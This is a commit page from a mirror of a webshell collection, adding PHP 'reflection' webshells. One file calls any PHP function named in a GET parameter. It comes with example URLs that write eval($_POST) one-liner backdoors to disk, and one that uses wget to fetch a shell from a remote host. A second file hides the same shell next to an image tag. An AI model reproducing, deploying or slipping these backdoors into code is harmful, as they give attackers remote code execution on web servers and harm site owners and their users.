1
0
mirror of https://github.com/tennc/webshell.git synced 2026-01-01 04:19:03 +00:00

update php reflection webshell

This commit is contained in:
tennc
2014-07-28 09:47:51 +08:00
parent 9f8c839cc1
commit a1436ab3e4
3 changed files with 23 additions and 0 deletions

BIN
php/p2j/11.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 60 KiB

View File

@@ -0,0 +1,15 @@
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
?>
http://xxx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?@eval($_POST[c]);?> //写入一句话马 for linux
http://xx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?php eval($_POST[c]);?> //写入一句话马 for windows
mu201405.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test11.php //在当前目录下面生成一句话马 for windows
news.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test11.php //当前目录下载一句话马 for linux

View File

@@ -0,0 +1,8 @@
<img src="11.jpg" alt="alt text" title="Title" />
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>